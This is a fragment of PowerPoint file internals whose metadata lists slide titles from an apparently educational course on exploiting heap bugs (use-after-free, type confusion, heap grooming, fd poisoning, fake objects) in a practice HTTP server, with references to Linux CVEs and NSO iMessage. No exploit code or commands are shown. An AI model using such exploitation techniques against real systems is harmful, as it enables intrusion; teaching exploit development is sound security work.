        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090475" y="2282294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 Pointer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330EFE4-D847-C74B-BAB0-A0AB5F25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00" y="1268019"/>
            <a:ext cx="5727770" cy="3325801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Use after free diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026FAC07-8955-6A4C-9CE0-4EFC59207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5" y="2914273"/>
            <a:ext cx="3463685" cy="17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01534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{CA71A65C-A00A-2747-A03F-77FB756D8FE5}tf10001057</Template>
  <TotalTime>11390</TotalTime>
  <Words>4863</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>861</Paragraphs>
  <Slides>130</Slides>
  <Notes>84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6" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Book</vt:lpstr>
      <vt:lpstr>Avenir Medium</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>SI Presentation Template 2016</vt:lpstr>
      <vt:lpstr>Final Module</vt:lpstr>
      <vt:lpstr>Class So Far</vt:lpstr>
      <vt:lpstr>HTTP Server – From Scratch</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>HTTP/1.1 Protocol From Afar</vt:lpstr>
      <vt:lpstr>HTTP – Line One </vt:lpstr>
      <vt:lpstr>HTTP – Headers</vt:lpstr>
      <vt:lpstr>HTTP – Body </vt:lpstr>
      <vt:lpstr>All Together</vt:lpstr>
      <vt:lpstr>Reponses</vt:lpstr>
      <vt:lpstr>Important Headers – 1 </vt:lpstr>
      <vt:lpstr>Important Headers – 2 </vt:lpstr>
      <vt:lpstr>List of Supported Headers</vt:lpstr>
      <vt:lpstr>List of Other Supported Things</vt:lpstr>
      <vt:lpstr>List of Non-Supported Things</vt:lpstr>
      <vt:lpstr>Start the Service</vt:lpstr>
      <vt:lpstr>Interact with the Server</vt:lpstr>
      <vt:lpstr>HTTP Request  </vt:lpstr>
      <vt:lpstr>HTTP Response – HTML </vt:lpstr>
      <vt:lpstr>Basic Review of Source Code</vt:lpstr>
      <vt:lpstr>Pattern Matching</vt:lpstr>
      <vt:lpstr>Source Code Review</vt:lpstr>
      <vt:lpstr>Use After Free Vulnerability</vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 1 </vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 2 </vt:lpstr>
      <vt:lpstr>Tracing UAF in Code Base</vt:lpstr>
      <vt:lpstr>Your Turn to Trace Bugs!</vt:lpstr>
      <vt:lpstr>Iterating Over res_header_lst</vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 1 (serve_file) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 2 (interpret_single_header) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 3 (send_response) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 4 (cleanup_response) </vt:lpstr>
      <vt:lpstr>Bug Recap</vt:lpstr>
      <vt:lpstr>How to Trigger? Bugs 1 &amp; 2</vt:lpstr>
      <vt:lpstr>How to Trigger? – Bug 3 </vt:lpstr>
      <vt:lpstr>How to Trigger? – Bug 4 </vt:lpstr>
      <vt:lpstr>Determining Exploitability</vt:lpstr>
      <vt:lpstr>res_header_lst – Diagram </vt:lpstr>
      <vt:lpstr>Routes - Diagram</vt:lpstr>
      <vt:lpstr>Exploitability</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Full Exploit Chain</vt:lpstr>
      <vt:lpstr>Info Leak</vt:lpstr>
      <vt:lpstr>Bug Classes</vt:lpstr>
      <vt:lpstr>Proper Way To Initialize Memory</vt:lpstr>
      <vt:lpstr>Example - BleedingTooth</vt:lpstr>
      <vt:lpstr>Uninitialized Memory Vuln Hunt</vt:lpstr>
      <vt:lpstr>Address Sanitizer (ASAN) </vt:lpstr>
      <vt:lpstr>Your Turn to Trace Bugs!</vt:lpstr>
      <vt:lpstr>Header Value Inside parse_single_header()</vt:lpstr>
      <vt:lpstr>Query Value – /echo </vt:lpstr>
      <vt:lpstr>Reviewing the Small Bin/Unsorted Bin</vt:lpstr>
      <vt:lpstr>Leak Information for Bins</vt:lpstr>
      <vt:lpstr>Tracing Allocations</vt:lpstr>
      <vt:lpstr>Leak Information for Bins</vt:lpstr>
      <vt:lpstr>Allocation/Freeing Primitives</vt:lpstr>
      <vt:lpstr>Parse URI Primitives</vt:lpstr>
      <vt:lpstr>Leak Strategy</vt:lpstr>
      <vt:lpstr>parse_single_header Primitives</vt:lpstr>
      <vt:lpstr>Half Science – Half Art</vt:lpstr>
      <vt:lpstr>Your Turn to Groom!</vt:lpstr>
      <vt:lpstr>Thought #1</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Use Allocation Primitives</vt:lpstr>
      <vt:lpstr>Large URL/Parameters = Groomed</vt:lpstr>
      <vt:lpstr>Many Headers = Groomed</vt:lpstr>
      <vt:lpstr>Leak with Hexdump</vt:lpstr>
      <vt:lpstr>Full Exploit Chain - UAF</vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 1 </vt:lpstr>
      <vt:lpstr>Your Turn to Use After Free!</vt:lpstr>
      <vt:lpstr>Interpret The Incoming Headers</vt:lpstr>
      <vt:lpstr>Connection Header</vt:lpstr>
      <vt:lpstr>Connection Header Creates UAF</vt:lpstr>
      <vt:lpstr>Proof of concept – HTML </vt:lpstr>
      <vt:lpstr>Proof of Concept – Crash </vt:lpstr>
      <vt:lpstr>Proof of Concept Result (ASAN)</vt:lpstr>
      <vt:lpstr>Proof of concept – HTML </vt:lpstr>
      <vt:lpstr>Double Free!</vt:lpstr>
      <vt:lpstr>UAF or DF? </vt:lpstr>
      <vt:lpstr>If All Techniques Fail?</vt:lpstr>
      <vt:lpstr>Living Off the Land</vt:lpstr>
      <vt:lpstr>What Makes a Good Object?</vt:lpstr>
      <vt:lpstr>timer_lst in Linux Networking</vt:lpstr>
      <vt:lpstr>CVE-2016-8655 Exploitation</vt:lpstr>
      <vt:lpstr>CVE-2017-6074 Exploitation</vt:lpstr>
      <vt:lpstr>UAF – Solution Diagram (Review)</vt:lpstr>
      <vt:lpstr>Fd Poison - Throwback</vt:lpstr>
      <vt:lpstr>UAF – Solution Diagram (Review)</vt:lpstr>
      <vt:lpstr>The World is Your Oyster</vt:lpstr>
      <vt:lpstr>Good Targets in HTTP Server?</vt:lpstr>
      <vt:lpstr>My Favorite Target</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 1 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 2 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 3 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 4 </vt:lpstr>
      <vt:lpstr>UAF Solution Throwback</vt:lpstr>
      <vt:lpstr>Your Turn to Create Exploit Plan!</vt:lpstr>
      <vt:lpstr>Target Chunk – 0x30 TCache</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 2 </vt:lpstr>
      <vt:lpstr>Target Allocation Requirements</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 3 </vt:lpstr>
      <vt:lpstr>Host Setting</vt:lpstr>
      <vt:lpstr>Target Allocation Requirements</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 4 </vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>What to Call?</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Netcat Listener</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Bonus Round!</vt:lpstr>
      <vt:lpstr>Number (Integer) Related Problems</vt:lpstr>
      <vt:lpstr>NSO iMessage Vulnerability – 1 </vt:lpstr>
      <vt:lpstr>NSO iMessage Vulnerability – 2 </vt:lpstr>
      <vt:lpstr>Integer Overflow in read_wrapper()</vt:lpstr>
      <vt:lpstr>Integer Overflow in add_string()</vt:lpstr>
      <vt:lpstr>Integer Overflow in add_string()</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>Complexity of Exploit</vt:lpstr>
      <vt:lpstr>Many Ways to Exploit This!</vt:lpstr>
      <vt:lpstr>Fd Poison – Most Straight Forward</vt:lpstr>
      <vt:lpstr>Exploitable!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Unlink</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>306</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-01T21:54:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-17T06:31:05Z</dcterms:modified>
</cp:coreProperties>
</file>